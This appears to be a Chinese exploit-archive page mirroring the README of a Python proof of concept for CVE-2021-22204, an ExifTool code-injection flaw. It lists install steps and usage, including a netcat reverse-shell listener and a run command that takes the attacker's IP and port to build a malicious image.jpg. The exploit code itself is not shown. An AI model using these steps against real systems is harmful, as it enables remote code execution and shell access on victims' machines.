POC详情: 7163951b5b882f164392f173ef0cb92c746123f5

来源
关联漏洞
标题: exiftool 代码注入漏洞 (CVE-2021-22204)
描述:exiftool是一个应用软件。使元数据更易于访问。 ExifTool 7.44版本及之前版本存在代码注入漏洞,该漏洞允许在解析恶意图像时任意执行代码。
描述
exiftool exploit
介绍
# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
   ## Youtube 
        404 notfound
## Requirements 
    python3 python3-pip djvulibre-bin exiftool

# Install requirements 

   ## Debian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Ubuntu
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Arch Linux
        pacman -S djvulibre libimage-exiftool-perl python python-pip
    
   ## Kali Linux
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Fedora
        dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
    
   ## OS X
        brew install djvulibre exiftool python
    
   ## Raspbian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
 
# How to run:
   ## Install python requirements
        sudo pip install -r requirements.txt

   ## start reverse shell with natcat
        nc -nvlp 4444

   ## Give execute permission 
        chmod +x exploit.py
   ## Run program
        python3 exploit.py {Your IP add adress} {Your Listening port} 
        
   ### OR 
        
        ./exploit.py {Your IP add adress} {Your Listening port}
   ## Example
    
        python3 exploit.py 192.168.0.1 4444
        
   ### OR 
        
        ./exploit.py 192.168.0.1 4444
   ## Output file name is 
        image.jpg
        
# About the vulnerability

The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)

This exploit was made by studying the exiftool patch after the CVE was already reported.

And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.
文件快照

[4.0K] /data/pocs/7163951b5b882f164392f173ef0cb92c746123f5 ├── [ 69K] exploit.py ├── [1.7K] README.md └── [ 58] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。